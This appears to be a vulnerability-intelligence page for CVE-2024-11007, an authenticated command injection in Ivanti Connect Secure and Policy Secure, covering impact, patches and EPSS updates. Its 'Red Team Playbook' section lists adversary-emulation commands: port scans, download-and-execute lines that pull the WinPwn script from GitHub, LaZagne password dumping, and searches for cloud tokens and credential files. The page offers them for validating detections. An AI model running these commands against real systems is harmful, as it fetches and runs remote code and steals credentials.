CVE-2024-11007
Overview
This vulnerability is a command injection flaw rooted in improper input validation within Ivanti Connect Secure and Ivanti Policy Secure. The flaw occurs in administrative interfaces that process user-supplied commands without adequate sanitization, allowing crafted input to be executed at the system level. The affected components are versions of Ivanti Connect Secure prior to 22.7R2.1 and Ivanti Policy Secure prior to 22.7R1.1, excluding 9.1Rx versions.
Vulnerability Description
Command injection in Ivanti Connect Secure before version 22.7R2.1 (Not Applicable to 9.1Rx) and Ivanti Policy Secure before version 22.7R1.1 (Not Applicable to 9.1Rx) allows a remote authenticated attacker with admin privileges to achieve remote code execution.
Impact
An attacker with authenticated administrative access can execute arbitrary system commands remotely, resulting in full system compromise including confidentiality, integrity, and availability impacts. The prerequisite is high-privilege authentication (PR:H) and network access (AV:N). This allows attackers to manipulate system configurations, extract sensitive data, disrupt services, or pivot within the network. The CVSS vector indicates low attack complexity (AC:L) and no user interaction (UI:N), amplifying the threat in environments where admin credentials are compromised or shared.
Solution
Ivanti recommends upgrading Ivanti Connect Secure to version 22.7R2.1 or later and Ivanti Policy Secure to version 22.7R1.1 or later to remediate this vulnerability. These versions include patches that properly sanitize command inputs in the administrative interfaces. Detailed patch instructions and advisory information are available at Ivanti's official security advisory portal: https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Ivanti Connect Secure and Ivanti Policy Secure is characterized by a command injection flaw that allows remote authenticated attackers with administrative privileges to execute arbitrary code on the affected systems. This type of vulnerability arises when an application improperly sanitizes user input, enabling an attacker to manipulate commands executed by the system. In this case, the flaw exists in versions prior to 22.7R2.1 for Connect Secure and 22.7R1.1 for Policy Secure, excluding the 9.1Rx versions. The potential for remote code execution (RCE) poses significant risks, as it allows attackers to gain control over the affected systems, potentially leading to further exploitation or data breaches.
Attack vectors for this vulnerability primarily involve authenticated users leveraging their administrative access to inject malicious commands into the system. Once an attacker successfully exploits the command injection flaw, they can execute arbitrary commands with the same privileges as the application. This could lead to a range of malicious activities, including the installation of malware, data exfiltration, or even lateral movement within the network to compromise other systems. Scenarios may include an attacker using a compromised admin account to run scripts that alter system configurations or extract sensitive information, thereby escalating the impact of the attack.
The real-world implications of this vulnerability are profound, particularly for organizations relying on Ivanti's solutions for secure access and policy management. The ability for an attacker to execute arbitrary code remotely can lead to severe business risks, including operational disruptions, financial losses, and reputational damage. Organizations may face regulatory penalties if sensitive data is compromised, especially in industries governed by strict compliance requirements. Additionally, the potential for data breaches could result in loss of customer trust and long-term damage to brand reputation, emphasizing the critical need for timely remediation.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected systems is essential to eliminate the risk associated with known vulnerabilities. Security teams should conduct thorough vulnerability assessments and penetration testing to identify potential weaknesses in their environment. Intrusion detection systems (IDS) can be configured to monitor for unusual activity that may indicate exploitation attempts. Furthermore, implementing strict access controls and minimizing the number of users with administrative privileges can significantly reduce the attack surface and limit the potential impact of any exploitation.
In conclusion, the command injection vulnerability in Ivanti Connect Secure and Policy Secure presents a significant threat to organizations that utilize these products. The potential for remote code execution underscores the importance of maintaining robust security practices, including timely updates, vigilant monitoring, and strict access controls. By adopting a proactive stance towards vulnerability management, organizations can better protect their systems and sensitive data from malicious actors seeking to exploit such weaknesses.
CSURFACE threat intelligence has identified a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-11007, reflecting a growing likelihood of exploitation in the near term. While no new exploit techniques or proof-of-concept code have surfaced, this upward adjustment in EPSS suggests heightened attacker interest or improved conditions for exploitation, possibly due to increased availability of vulnerable targets or changes in attacker tactics. Our telemetry indicates that while exploitation attempts remain stable, the relative risk posed by this vulnerability is rising, warranting continued vigilance. This shift elevates the threat profile from a static concern to a more dynamic risk, emphasizing the need for defenders to prioritize monitoring and response capabilities around Ivanti Connect Secure environments.
Update 2 — July 12, 2026
CSURFACE threat intelligence has detected an initial confirmed exploitation attempt targeting CVE-2024-11007, marking a shift from previous periods of no observed activity. This emergence of exploitation signals that threat actors with administrative access are actively leveraging the command injection vulnerability in Ivanti Connect Secure environments. Although the overall EPSS score remains moderate and stable, the presence of actual exploitation attempts underscores an increased operational interest and validates the vulnerability as a viable attack vector in the wild. For defenders, this development elevates the urgency to monitor administrative access and related telemetry closely, as adversaries are now demonstrating capability and intent to execute remote code through this flaw. Consequently, the threat level should be considered heightened from theoretical risk to active exploitation, necessitating enhanced situational awareness around affected Ivanti products.
Affected Products (12)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Connect Secure | All |
cpe:2.3:a:ivanti:connect_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:-:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.1:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.2:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.3:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.4:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r1.5:*:*:*:*:*:*
|
|
|
Ivanti | Connect Secure | 22.7 |
cpe:2.3:a:ivanti:connect_secure:22.7:r2:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | All |
cpe:2.3:a:ivanti:policy_secure:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 22.7 |
cpe:2.3:a:ivanti:policy_secure:22.7:-:*:*:*:*:*:*
|
|
|
Ivanti | Policy Secure | 22.7 |
cpe:2.3:a:ivanti:policy_secure:22.7:r1:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-11007 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-ICS-Ivanti-Policy-Secure-IPS-Ivanti-Secure-Access-Client-ISAC-Multiple-CVEs |